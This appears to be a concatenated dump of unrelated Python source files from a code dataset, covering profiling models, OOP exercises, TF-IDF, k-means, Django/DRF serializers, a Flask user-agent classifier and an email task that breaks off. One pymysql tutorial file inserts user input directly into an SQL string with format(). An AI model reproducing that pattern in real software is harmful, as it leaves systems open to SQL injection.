{1}\".format(self.line, self.name)\n\n def visit(self, visitor):\n return visitor.visit_single(self)\n\n def to_dict(self, nid):\n return {\n 'index': nid,\n 'caller_id': self.parent,\n 'name': self.name,\n 'node': {\n 'trial_id': self.trial_id,\n 'line': self.line,\n 'count': self.count,\n 'duration': self.duration,\n 'info': Info(self)\n }\n }\n\n\nclass Mixed(TreeElement):\n\n def __init__(self, activation):\n self.duration = activation.duration\n self.elements = [activation]\n self.parent = activation.parent\n self.id = activation.id\n self.repr = activation.repr\n\n @property\n def count(self):\n return sum(e.count for e in self.elements)\n\n @count.setter\n def count(self, value):\n pass\n\n @property\n def duration(self):\n return sum(e.duration for e in self.elements)\n\n @property\n def first(self):\n return next(iter(self.elements))\n\n @duration.setter\n def duration(self, value):\n pass\n\n def add_element(self, element):\n self.elements.append(element)\n\n def visit(self, visitor):\n return visitor.visit_mixed(self)\n\n def mix(self, other):\n self.elements += other.elements\n self.mix_results()\n\n def mix_results(self):\n it = iter(self.elements)\n initial = next(it)\n for element in it:\n initial.mix(element)\n\n\nclass Group(TreeElement):\n\n def __init__(self):\n self.nodes = OrderedDict()\n self.edges = OrderedDict()\n self.duration = 0\n self.parent = None\n self.count = 1\n self.repr = \"\"\n\n def initialize(self, previous, next):\n self.nodes[next] = Mixed(next)\n self.duration = next.duration\n self.next = next\n self.last = next\n self.add_subelement(previous)\n self.parent = next.parent\n return self\n\n def add_subelement(self, previous):\n next, self.next = self.next, previous\n if not previous in self.edges:\n self.edges[previous] = utils.OrderedCounter()\n if not previous in self.nodes:\n self.nodes[previous] = Mixed(previous)\n else:\n self.nodes[previous].add_element(previous)\n self.edges[previous][next] += 1\n\n def calculate_repr(self):\n result = [\n \"[{0}-{1}->{2}]\".format(previous, count, next)\n for previous, edges in self.edges.items()\n for next, count in edges.items()\n ]\n\n self.repr = \"G({0})\".format(', '.join(result))\n\n def __eq__(self, other):\n if type(self) != type(other):\n return False\n if not self.edges == other.edges:\n return False\n return True\n\n def visit(self, visitor):\n return visitor.visit_group(self)\n\n def mix(self, other):\n for node, value in self.nodes.items():\n value.mix(other.nodes[node])\n\n\nclass Call(TreeElement):\n\n def __init__(self, caller, called):\n self.caller = caller\n self.called = called\n self.called.calculate_repr()\n self.parent = caller.parent\n self.count = 1\n self.id = self.caller.id\n self.duration = self.caller.duration\n self.repr = 'C({0}, {1})'.format(self.caller, self.called)\n\n def __eq__(self, other):\n if type(self) != type(other):\n return False\n if not self.caller == other.caller:\n return False\n if not self.called == other.called:\n return False\n return True\n\n def visit(self, visitor):\n return visitor.visit_call(self)\n\n def mix(self, other):\n self.caller.mix(other.caller)\n self.called.mix(other.called)\n\n\nclass Info(object):\n\n def __init__(self, single):\n self.title = (\"Trial {trial}
\"\n \"Function {name} called at line {line}\").format(\n trial=single.trial_id, name=single.name, line=single.line)\n self.activations = set()\n self.duration = \"\"\n self.mean = \"\"\n self.extract_activations(single)\n\n def update_by_node(self, node):\n self.duration = self.duration_text(node['duration'], node['count'])\n self.mean = self.mean_text(node['mean'])\n self.activation_list = sorted(self.activations, key=lambda a: a[0])\n\n def add_activation(self, activation):\n self.activations.add(\n (datetime.strptime(activation['start'], FORMAT), activation))\n\n def extract_activations(self, single):\n for activation in single.activations:\n self.add_activation(activation)\n\n def duration_text(self, duration, count):\n return \"Total duration: {} microseconds for {} activations\".format(\n duration, count)\n\n def mean_text(self, mean):\n return \"Mean: {} microseconds per activation\".format(mean)\n\n def activation_text(self, activation):\n values = map(row_to_dict, persistence.load('object_value',\n function_activation_id=activation['id'], order='id'))\n values = [value for value in values if value['type'] == 'ARGUMENT']\n result = [\n \"\",\n \"Activation #{id} from {start} to {finish} ({dur} microseconds)\"\n .format(dur=calculate_duration(activation), **activation),\n ]\n if values:\n result.append(\"Arguments: {}\".format(\n \", \".join(\"{}={}\".format(value[\"name\"], value[\"value\"])\n for value in values)))\n return result + [\n \"Returned {}\".format(activation['return'])\n ]\n\n def __repr__(self):\n result = [self.title, self.duration, self.mean]\n for activation in self.activation_list:\n result += self.activation_text(activation[1])\n\n return '
'.join(result)\n\n\ndef join(a, b):\n if a == b:\n return Dual(a, b)\n return Branch(a, b)\n\n\ndef sequence(previous, next):\n if isinstance(next, Group):\n next.add_subelement(previous)\n return next\n return Group().initialize(previous, next)\n\n\ndef add_flow(stack, result, previous, next):\n if previous.parent == next.parent:\n # Same function level\n result.append(sequence(previous, next))\n\n elif previous.id == next.parent:\n # Previously called next\n # if top of result is in the same level of call:\n # create sequece or combine results\n # if top of result is in a higher level, put Call on top of pile\n if result:\n add_flow(stack, result, Call(previous, next), result.pop())\n else:\n result.append(Call(previous, next))\n else:\n # Next is in a higher level\n # Put previous on top of result\n result.append(next)\n result.append(previous)\n","sub_path":"capture/noworkflow/now/models/trial.py","file_name":"trial.py","file_ext":"py","file_size_in_byte":18415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"429493253","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[46]:\n\n\nclass Dog():\n def __init__(self,name,age):\n self.name = name\n self.age = age \n\n\n# In[54]:\n\n\nclass Dog():\n pass\na = Dog()\n\n\n# In[55]:\n\n\nb = Dog()\na==b\n\n\n# In[89]:\n\n\n# 55>34<44\nclass Dog():\n \n def __init__(self,name,age):\n self.name = name \n self.age = age \n \nphilo = Dog(\"philo\",55)\nvicky = Dog(\"vicky\",33)\nlesi = Dog(\"lesi\",10)\nprint(\"{} is {} and {} is {} and {} is {}.\".format(philo.name,philo.age,vicky.name,vicky.age,lesi.name,lesi.age))\nif philo.age >= vicky.age:\n print(\"philo is older than vicky\")\nelif philo.age >= lesi.age:\n print(\"philo is older\")\nelse:\n print(\"lesi is older\")\n\n\n# In[100]:\n\n\nclass Dog():\n species = \"mammal\"\n def __init__(self,name,age):\n self.name = name \n self.age = age \n def speak(self, sound):\n print(\"{} speaks {}.\".format(self.name,sound))\nname1 = Dog(\"oaty\",55)\nname1.speak(\"booo booo\")\nclass Dog1(Dog):\n def cat(self,sound):\n print(\"{} speaks {}.\".format(self.name,sound))\n \nname2 = Dog1(\"caty\",\"45\")\nname2.speak(\"meomee\")\n\n\n# In[47]:\n\n\n#oops concept reverse a string \nclass concept():\n def __init__(self,string):\n self.string = string\n self.length = len(string)\n def reverse_string(self):\n if self.length <2:\n return False\n else:\n string1 = self.string[::-1]\n print(string1)\n def loop(self):\n for i in string1:\n print(i)\n \nconcept1 = concept(\"shiva\")\nconcept2 = concept(\"ram\")\nconcept1.reverse_string()\nconcept2.reverse_string()\n\n\n# In[2]:\n\n\n#attributes and instances declaration \nclass car():\n def __init__(self,color,model,year): #instance of class color,model and year are instance variables\n self.color = color #attributes of clas\n self.model = model #attributes of class\n self.year = year #attributes of class\n \n\n\n# In[35]:\n\n\n# Encapsulation\n\nclass Human():\n \n __privateVar = \"this is __private variable\"\n\n def __init__(self):\n self.className = \"Human class constructor\"\n self.__privateVar = \"this is redefined __private variable\"\n\n \n def showName(self, name):\n self.name = name\n return self.__privateVar + \" \" + name\n\n \n def __privateMethod(self):\n return \"Private method\"\n\n \n def _protectedMethod(self):\n return \"Protected method\"\n\n \n def showPrivate(self):\n return self.__privateMethod()\n\n def showProtecded(self):\n return self._protectedMethod()\n\n\nclass 
Male(Human):\n    def showClassName(self):\n        return \"Male\"\n\n    def showPrivate(self):\n        return self.__privateMethod()\n\n    def showProtected(self):\n        return self._protectedMethod()\n\n\nclass Female(Human):\n    def showClassName(self):\n        return \"Female\"\n\n    def showPrivate(self):\n        return self.__privateMethod()\n\n    def showProtected(self):\n        return self._protectedMethod()\n\n\nh = Human()\nprint(h.className)\nprint(h.showName(\"Vasya\"))\nprint(h.showPrivate())\nprint(h.showProtecded())\n# print(h.privateMethod())\n# print(h.protectedMethod())\nprint(\"\\n\")\n\nm = Male()\nprint(m.className)\nprint(m.showClassName())\n# print(m.showPrivate())\nprint(m.showProtected())\nprint(\"\\n\")\n\nf = Female()\nprint(f.className)\nprint(f.showClassName())\nprint(f.showProtected())\nprint(\"\\n\")\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"oops python practice-Copy1 (1).py","file_name":"oops python practice-Copy1 (1).py","file_ext":"py","file_size_in_byte":3409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} {"seq_id":"573426149","text":"from ShelterSmartHome.apps.gpsnode.models import GpsNodeGt06\n\n\n# ----------- Saving command to Database -----------\n\n\ndef command(inp, gps_name):\n    terminal = GpsNodeGt06.objects.get(gps_name=gps_name)\n    if inp == 'info':\n        terminal.command = 'locate_info'\n        terminal.save()\n    elif inp == 'block':\n        terminal.command = 'cut_oil_and_elect'\n        terminal.save()\n    elif inp == 'unblock':\n        terminal.command = 'conn_oil_and_elect'\n        terminal.save()\n","sub_path":"ShelterSmartHome/apps/gpsnode/gt06/server_command_to_db.py","file_name":"server_command_to_db.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} {"seq_id":"351819221","text":"class ApiRequestDataDepend(object):\n    def apirequestdatadepend(self,activeapi,dependid):\n        activeapi.outPutMyLog(\"dependency id (dependid): %s\" % dependid)\n        if dependid != None:\n            activeapi.outPutMyLog(\"executing dependency\")\n            from testapidatas.models import ApiRequestData\n            apirequestdatatestcases = ApiRequestData.objects.filter(id=int(dependid))\n            print(\"apirequestdatatestcases:%s\" % apirequestdatatestcases)\n            if str(apirequestdatatestcases) != \"\":\n                activeapi.outPutMyLog(\"found dependency data\")\n                for apirequestdatatestcase in apirequestdatatestcases:\n                    depend = apirequestdatatestcase.depend_case_id\n                    activeapi.outPutMyLog(\"depend:%s\" % depend)\n                    if depend != None:\n                        activeapi.outPutMyLog(\"entering the next dependency level\")\n                        self.apirequestdatadepend(activeapi,depend)\n\n                    activeapi.outPutMyLog(\"executing case id: %s\" % apirequestdatatestcase.id)\n\n                    # make the API request\n                    url = apirequestdatatestcase.request_url\n\n                    from depend.requestsdepend.handleRequestsHeaders import handlerequestsheaders\n                    from depend.requestsdepend.handleRequestCookies import handlerequestscookies\n                    from depend.requestsdepend.handleRequestDatas import handlerequestsdatas\n\n                    headers = handlerequestsheaders.handlerequestsheaders(activeapi,apirequestdatatestcase.id)\n                    cookies = handlerequestscookies.handlerequestscookies(activeapi,apirequestdatatestcase.id)\n                    data = handlerequestsdatas.handlerequestsdatas(activeapi,apirequestdatatestcase.id)\n\n                    if apirequestdatatestcase.is_post: # send a POST request\n                        if apirequestdatatestcase.is_json:\n                            activeapi.define_Post_Json(url=url, headers=headers, cookies=cookies, json=data)\n                        else:\n                            activeapi.define_Post_Data(url=url, headers=headers, cookies=cookies, data=data)\n\n                    else: # send a GET request\n                        activeapi.define_Get(url=url, url_params=data, headers=headers, 
cookies=cookies)\n\n\n else:\n activeapi.outPutErrorMyLog(\"没有找到依赖id[%s]对应的数据!\" % dependid)\n else:\n activeapi.outPutMyLog(\"依赖ID为None,不执行依赖!\")\n\napirequestdatadepend = ApiRequestDataDepend()","sub_path":"depend/requestsdepend/apiRequestDataDepend.py","file_name":"apiRequestDataDepend.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"309135007","text":"#!/usr/bin/env python\r\n#coding=utf-8\r\n\r\n'''\r\n caculate TFIDF\r\n\r\n @author: zhangqiang\r\n @date: 2016/4/15\r\n'''\r\n\r\nfrom __future__ import division\r\nimport math\r\n\r\n\r\ndef TFIDF(cutWords,cutCorpuss):\r\n #计算TF值\r\n length = len(cutWords)\r\n myset = set(cutWords) #myset是另外一个列表,里面的内容是mylist里面的无重复项\r\n #print set(cutWords)\r\n tfs = []#所有元素的tf值列表\r\n for item in myset:\r\n tf = cutWords.count(item)/length#结果为实数,需要from __future__ import division\r\n tfs.append(tf)\r\n #print 'TF值:',tfs\r\n\r\n #计算IDF值,以语料库中的一行(问诊记录)为一个文档\r\n totalDocs = len(cutCorpuss)\r\n idfs = []\r\n\r\n for item in myset:\r\n count = 0\r\n for doc in cutCorpuss:\r\n if item in doc:\r\n count += 1\r\n idfs.append(math.log(totalDocs/(count+1)))\r\n #print 'IDF值:',idfs\r\n\r\n #计算TF-IDF值\r\n tfidfs = []\r\n for i in range(len(tfs)):\r\n tfidfs.append(tfs[i]*idfs[i])\r\n #print 'TF-IDF值',tfidfs\r\n\r\n return tfidfs,myset\r\n\r\n","sub_path":"demo/Word2Vec/ExtractKeywords/TFIDF.py","file_name":"TFIDF.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"495320592","text":"from slacker import Slacker\nfrom blackbelt.config import config\n\nclass Slack(object):\n def __init__(self, token=None):\n if not token:\n token = config['slack']['access_token']\n slack = Slacker(token)\n self.slack = slack\n if not token:\n raise ValueError(\"Can't do things with Slack without access token. 
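For reference, a hypothetical call shape for the `TFIDF` function in the record above: the first argument is the token list of the document being scored, the second is the whole corpus as a list of token lists. Pairing the two return values with `zip` works because both are built by iterating the same set within a single call:

```python
# Toy corpus; the medical terms are made up, purely for illustration.
corpus = [
    ["headache", "fever", "cough"],
    ["fever", "rash"],
    ["cough", "fatigue", "cough"],
]
scores, vocab = TFIDF(corpus[2], corpus)
for word, score in zip(vocab, scores):
    print(word, round(score, 4))
```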
Run bb init.\")\n\n self.token = token\n\n def post_message(self, message, room='#engine-room'):\n return self.slack.chat.post_message(room, message)\n\n\ndef post_message(message):\n client = Slack()\n client.post_message(message)\n","sub_path":"blackbelt/slack.py","file_name":"slack.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"558364685","text":"import pymysql\n\n# 1.链接数据库\n# 参数: 服务器地址,用户名,密码,数据库名,端口(默认3306),指定字符集。\nconn = pymysql.connections.Connection(host='localhost',\n user='root',\n password=' ',\n database='practice',\n port=3306,\n charset='utf8'\n )\n\n# 2.创建一个游标对象。\n# 如果不指定参数,默认返回元组:(('101', '李军', '男'), ('103', '陆君', '男'), ('105', '匡明', '男'), ('107', '王丽', '女'), ('108', '曾华', '男'))\ncursor = conn.cursor(cursor=pymysql.cursors.DictCursor)\n# 如果指定参数, 返回是列表:\n# [{'sno': '101', 'sname': '李军', 'ssex': '男'}, {'sno': '103', 'sname': '陆君', 'ssex': '男'}, {'sno': '105', 'sname': '匡明', 'ssex': '男'}, {'sno': '107', 'sname': '王丽', 'ssex': '女'}, {'sno': '108', 'sname': '曾华', 'ssex': '男'}]\n\n# 3.执行sql语句.\nsno = input('请输入学生的姓名:')\n\n# 字符串参数 两边需要添加单引号\nsql = \"select sno,sname,ssex from student where sname like '{}%'\".format(sno)\n# print(sql)\n\ntry:\n\trows = cursor.execute(sql) # 返回受影响的行数\n\n\tif rows > 0:\n\t\t# print(rows) 6\n\t\t# 4.读取结果集\n\t\t# data = cursor.fetchone() # 获取一条记录\n\t\t# data = cursor.fetchmany(5) # 获取n=5条记录\n\t\tdata = cursor.fetchall() # 获取所有记录\n\t\tprint(data)\n\t\t# print(cursor._executed) # 获取所执行的sql语句\nexcept Exception as e:\n\tprint(e)\n\n\nfinally:\n# 5.关闭链接\n\tcursor.close()\n\tconn.close()\n\n","sub_path":"day24.1.21/数据库/02_带参数的查询.py","file_name":"02_带参数的查询.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"309587933","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport random as rd\ndotcolor=['.r','.g','.y','.b','.m','.k']\t\t#点的颜色\nlabelcolor=['*r','*g','*y','*b','*m','*k']\t\t#簇心的颜色\ndef readDtata():\n\tdata=[]\n\twith open('./cluster.dat','r') as f:\t#以可读方式打开dat数据文件\n\t\tfor line in f.readlines():\t\t#逐行读入数据\n\t\t\tline=list(line.strip().split())\n\t\t\tline[0]=eval(line[0])\n\t\t\tline[1]=eval(line[1])\n\t\t\tcurrent=[]\n\t\t\tfor i in line:\n\t\t\t\tcurrent.append(i)\t#存入current作为二维数组\n\t\t\tdata.append(current)\n\t\tTestData=rd.sample(data,200)\t#随机选择200个作为测试数据\n\t\tTrainData=[i for i in data if i not in TestData]\t#将剩下的800个作为训练数据\n\t\treturn np.mat(TestData),np.mat(TrainData)\ndef drawpicture(input,center,postion,number,k):\t\t#画出散点图\n\tfor i in range(number):\n\t\tif postion[i]==-1:\n\t\t\tpostion[i]=5\t#初始时将点画为黑色\n\t\tplt.plot(input[i,0],input[i,1],dotcolor[postion[i]])\t#画每个点\n\tfor i in range(k):\t\t#画簇心\n\t\tplt.plot(center[i,0],center[i,1],labelcolor[i])\n\tplt.show()\n\ndef BetweenDistance(m,n):\t#计算两个点的距离\n\tlength=len(m)\n\ttotal=0\n\tfor temp in range(2):\t#通过分别计算每个维度来计算两个点的欧式距离\n\t\tdistance=(m[0,temp]-n[0,temp])**2\n\t\ttotal+=distance\n\treturn np.sqrt(total)\n\n\n\n\ndef getInitialCenter(input,k):\t#初始化质心\n\tcenter=np.mat(np.zeros((k,2)))\t#得到质心的矩阵\n\tfor i in range(2):\n\t\tr=np.random.rand(k,1)*(max(input[:,i])-min(input[:,i]))\t#设置随机因子\n\t\tcenter[:,i]=(min(input[:,i])+r)\t#随机初始化\n\treturn center\n\ndef getNewCenter(input,postion,k,number):\t#更新簇心位置\n\tnewcenter=np.zeros((k,2))\n\tfor i in range(k):\t\t#对于所有的簇心\n\t\tn=0\n\t\ttemp = []\n\t\tfor j in range(number):\t#对于所有属于簇心i的那些点,加入到temp数组中\n\t\t\tif 
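The query in the pymysql record above is assembled with `str.format()`, which leaves it open to SQL injection. pymysql can bind values itself via `cursor.execute(sql, args)` with `%s` placeholders; a hedged sketch of that variant (connection details are placeholders, mirroring the record):

```python
# Parameterized version of the LIKE query: the driver quotes the value,
# so user input cannot break out of the string literal.
import pymysql

conn = pymysql.connect(host='localhost', user='root', password=' ',
                       database='practice', charset='utf8')
try:
    with conn.cursor(pymysql.cursors.DictCursor) as cursor:
        name_prefix = input('Student name prefix: ')
        sql = "select sno, sname, ssex from student where sname like %s"
        cursor.execute(sql, (name_prefix + '%',))
        print(cursor.fetchall())
finally:
    conn.close()
```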
postion[j]==i:\n\t\t\t\tn+=1\n\t\t\t\ttemp.append(input[j,:])\n\t\tif n!=0:\n\t\t\tnewcenter[i,:]=np.mean(temp,axis=0)\t#如果簇心不为空,通过属于簇心的点来更新簇心\n\treturn np.mat(newcenter)\n\n\n\n\ndef KMeansClusterAnalysis(TestData,TrainData,k,flag=1):\n\tnumber=np.shape(TrainData)[0]\t#得到点的数量\n\tcenter=getInitialCenter(TrainData,k)\t#得到k个初始点\n\ttrain_postion=[-1]*number\t#所有点的归属的簇心\n\ttest_postion=[-1]*200\n\tepoch_loss=[]\n\tdrawpicture(TrainData, center, train_postion, 800, k)\t#画出初始点\n\twhile flag==1:\n\t\tmin_distance = [9999] * number\t#所有点到某个簇心的最小距离\n\t\tsum_loss=0\n\t\tfor i in range(200):\t#损失等于所有点的损失和\n\t\t\tsignal_loss=9999\n\t\t\tfor j in range(k):\t#计算每个点的损失\n\t\t\t\tdistance=BetweenDistance(TestData[i],center[j])\n\t\t\t\tif distance 0\n assert args.batch_size > 0\n assert args.in_channels > 0\n assert args.out_classes > 0\n\n model = vgg16_bn()\n model = torch.nn.DataParallel(model).cuda()\n model = model.cuda()\n\n print('Total params: %.2fM' % (sum(p.numel() for p in model.parameters()) / kMega))\n\n for test_idx in range(args.test_number):\n print(\"-------------------------------------------------------------------------------------------------------\")\n print(\"Testing {} out of {}\".format(test_idx, args.test_number))\n in_tensors = torch.rand([args.batch_size, args.in_channels, args.dim_y, args.dim_x])\n in_tensors = in_tensors.cuda()\n\n out_tensors = model(in_tensors)\n\n assert out_tensors.size()[0] == args.batch_size\n\n print(\"input shape = \", in_tensors.shape)\n print(\"output shape = \", out_tensors.shape)\n print(\"min value of output = \", out_tensors.min())\n print(\"max value of output = \", out_tensors.max())\n\n return\n\n\nif __name__ == '__main__':\n args = ParseArguments()\n\n TestVggnet2d(args)\n","sub_path":"net/vggnet_test.py","file_name":"vggnet_test.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"527392191","text":"from __future__ import unicode_literals\n\n\nclass ObjectDict(dict):\n\n \"\"\"\n An object that is usable as a dict or an object.\n\n .. 
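For contrast with the per-point loops in the k-means record above, here is a vectorized sketch of the assignment step using plain NumPy arrays (not `np.mat`); `assign_points` is an illustrative helper, not part of the original:

```python
# Vectorized nearest-centroid assignment: one broadcasted distance
# computation replaces the nested BetweenDistance loops.
import numpy as np

def assign_points(points, centers):
    # (n, 1, d) - (1, k, d) broadcasts to an (n, k, d) difference cube
    diff = points[:, None, :] - centers[None, :, :]
    dists = np.sqrt((diff ** 2).sum(axis=2))  # (n, k) Euclidean distances
    return dists.argmin(axis=1)               # index of the nearest center

pts = np.random.rand(10, 2)
ctr = np.random.rand(3, 2)
print(assign_points(pts, ctr))
```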
code-block:: python\n\n o = ObjectDict()\n o.key = 'value'\n print(o['key'])\n 'value'\n \"\"\"\n\n def __init__(self, dictionary=None):\n dict.__init__(self)\n\n if dictionary is None:\n dictionary = dict()\n\n for key, value in dictionary.items():\n setattr(self, key, value)\n\n def __setattr__(self, name, value):\n if isinstance(value, dict):\n value = ObjectDict(value)\n dict.__setitem__(self, name, value)\n\n def __getattr__(self, name):\n \"\"\"Emulate the attribute with the dict key.\"\"\"\n if name in self:\n return dict.__getitem__(self, name)\n else:\n raise AttributeError(name)\n\n def __delattr__(self, name):\n \"\"\"Emulate the attribute with the dict key.\"\"\"\n if name in self:\n dict.__delitem__(self, name)\n else:\n raise AttributeError(name)\n\n __setitem__ = __setattr__\n","sub_path":"python-leryan.types/leryan/types/objectdict.py","file_name":"objectdict.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"375680387","text":"from todo import models\n\nfrom rest_framework import serializers\nfrom django.contrib.auth.models import User, Group\n\nclass UserSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = User\n fields = ('url', 'email')\n\nclass GroupSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = Group\n fields = ('url', 'name')\n\n\nclass TodoItemSerializer(serializers.ModelSerializer):\n class Meta:\n model = models.TodoItem\n fields = ('url', 'todo_list', 'text', 'completed', 'user', 'deleted')\n\nclass TodoListSerializer(serializers.ModelSerializer):\n todo_items = serializers.StringRelatedField(\n many=True,\n )\n\n class Meta:\n model = models.TodoList\n fields = ('id','url', 'name', 'user', 'created', 'todo_items')\n\nclass TodoListHyperlinkSerializer(serializers.ModelSerializer):\n\n todo_items = serializers.HyperlinkedRelatedField(\n many=True,\n view_name='todoitem-detail',\n read_only=True\n )\n\n class Meta:\n model = models.TodoList\n fields = ('id','url', 'name', 'user', 'created', 'todo_items')\n\nclass TodoListPKSerializer(serializers.ModelSerializer):\n\n todo_items = serializers.PrimaryKeyRelatedField(\n many=True,\n read_only=True\n )\n\n class Meta:\n model = models.TodoList\n fields = ('id','url', 'name', 'user', 'created', 'todo_items')\n\n\n\nclass TodoListTodoItemSerializer(serializers.ModelSerializer):\n\n todo_items = TodoItemSerializer(many=True, read_only=True)\n\n class Meta:\n model = models.TodoList\n fields = ('id','url', 'name', 'user', 'created', 'todo_items')\n","sub_path":"todo/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"62376542","text":"from protocols.base import BaseProto, ClosedConnectionError\n\n\nclass TCPProto(BaseProto):\n\n\n proto_name = \"tcp\"\n\n def __init__(self, stream_id, client, server, config, listener):\n\n BaseProto.__init__(self, stream_id, client, server, config, listener)\n\n def forward_outbound(self):\n\n while True:\n \n try:\n self.recv_outbound()\n self.send_outbound()\n\n except ClosedConnectionError as e:\n return\n\n def forward_inbound(self):\n\n while True:\n\n try:\n self.recv_inbound()\n self.send_inbound()\n\n except ClosedConnectionError as e:\n 
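A quick demonstration of the `ObjectDict` class above: because `__setattr__` wraps dict values recursively, attribute access and key access both work at any nesting depth:

```python
# Usage sketch for ObjectDict (values here are arbitrary examples).
o = ObjectDict({'server': {'host': 'localhost', 'port': 8080}})
print(o.server.host)         # localhost  (attribute chain)
print(o['server']['port'])   # 8080       (plain dict access)
o.timeout = 30               # __setattr__ stores it as a dict key
print(o['timeout'])          # 30
del o.timeout                # __delattr__ removes the key
```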
return\n","sub_path":"protocols/tcp.py","file_name":"tcp.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"359926737","text":"from flask import Flask, request, jsonify\nimport numpy as np\nimport joblib\nimport pandas as pd\nfrom sklearn.svm import OneClassSVM\nfrom user_agents import parse\nimport re\n\nclf = joblib.load('clf.pkl')\ntrain_columns =joblib.load('train_columns.pkl')\ntrain_columns_order=joblib.load('train_columns_order.pkl')\n\ndef predict(ua_str,clf,train_columns,train_columns_order):\n benign=pd.DataFrame([ua_str])\n benign.columns=['user_agent']\n benign['timestamp']=benign['user_agent'].apply(lambda x: re.findall(r'^\\[(.+?)\\]',x)[0])\n benign['timestamp_obj']=benign['timestamp'].apply(lambda x:pd.to_datetime(x,format='%d/%b/%Y:%H:%M:%S -0700',errors='coerce'))\n benign['min']=benign['timestamp_obj'].apply(lambda x:(x.hour,x.minute))\n sample=benign\n sample['user_id']=benign['user_agent'].apply(lambda x: re.findall(r'user_\\d+|Nico Rosberg',x)[0])\n sample['browser_family']=sample['user_agent'].apply(lambda x:parse(x).browser.family)\n sample['browser_version']=sample['user_agent'].apply(lambda x:parse(x).browser.version_string)\n sample['os_family']=sample['user_agent'].apply(lambda x:parse(x).os.family)\n sample['os_version']=sample['user_agent'].apply(lambda x:parse(x).os.version_string)\n sample['device_family']=sample['user_agent'].apply(lambda x:parse(x).device.family)\n sample['device_brand']=sample['user_agent'].apply(lambda x:parse(x).device.brand)\n sample['device_model']=sample['user_agent'].apply(lambda x:parse(x).device.model)\n sample['is_mobile']=sample['user_agent'].apply(lambda x:parse(x).is_mobile)\n sample['is_tablet']=sample['user_agent'].apply(lambda x:parse(x).is_tablet)\n sample['is_pc']=sample['user_agent'].apply(lambda x:parse(x).is_pc)\n sample['is_touch_capable']=sample['user_agent'].apply(lambda x:parse(x).is_touch_capable)\n sample['is_bot']=sample['user_agent'].apply(lambda x:parse(x).is_bot)\n sample_cln=sample.drop(['user_agent','timestamp','timestamp_obj','min','os_version','browser_version','device_family','device_brand','device_model'],axis=1)\n sample_cln=pd.concat([sample_cln,pd.get_dummies(sample_cln['os_family'])],axis=1).drop(['os_family'],axis=1)\n sample_cln=pd.concat([sample_cln,pd.get_dummies(sample_cln['browser_family'])],axis=1).drop(['browser_family'],axis=1)\n\n \n # Get columns missing from test sample\n missing_cols = train_columns - set(sample_cln.columns)\n # Add missing column and set to zero\n for c in missing_cols:\n sample_cln[c] = 0\n # Reset column order\n sample_cln = sample_cln[train_columns_order]\n \n X=sample_cln.values\n \n\n try:\n result=clf.predict(X)\n if result==1:\n classification='benign'\n else:\n classification='non_benign'\n \n msg=sample['user_id'][0]+' is '+classification+' *** Browser:'+sample['browser_family'][0]+' Mobile:'+ ('yes' if sample['is_mobile'][0] else 'no')\n \n return msg\n except:\n return \n\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef index():\n\treturn '
User Agent API Live!'\n\n\n@app.route('/api/user_agent',methods =['POST','GET'])\ndef ua_pred():\n\t#content = request.json\n    ua_str = request.args.get('ua')\n    result = predict(ua_str,clf,train_columns,train_columns_order)\n    return '''{}'''.format(result)#jsonify(result)\n\n\n\nif __name__=='__main__':\n\tapp.run()\n","sub_path":"user_agent_api2.py","file_name":"user_agent_api2.py","file_ext":"py","file_size_in_byte":3343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
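A hypothetical client for the Flask endpoint defined in the record above, assuming the app runs locally on Flask's default port; the handler reads the raw log line from the `ua` query parameter, and the log line shown here is made up to satisfy the timestamp and `user_\d+` regexes in `predict`:

```python
# Illustrative request against the /api/user_agent endpoint.
import requests

log_line = ('[25/May/2015:23:11:15 -0700] "GET / HTTP/1.1" user_42 '
            'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36')
resp = requests.get('http://127.0.0.1:5000/api/user_agent',
                    params={'ua': log_line})
print(resp.status_code, resp.text)
```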
+{"seq_id":"449039776","text":"from celery import Celery\nfrom django.conf import settings\nfrom django.core.mail import send_mail\n\nbroker = settings.REDIS_URL.format(3)\n\napp = Celery('celery_task.task', broker=broker)\n\n\n@app.task\ndef send_register_active_mail(to_email, username, token):\n subject = '生鲜商城欢迎信息'\n message = ''\n sender = settings.EMAIL_FROM\n receiver = [to_email]\n html_message = f'

{username}, 欢迎您成为天天生鲜注册会员

请点击下面链接激活您的账户
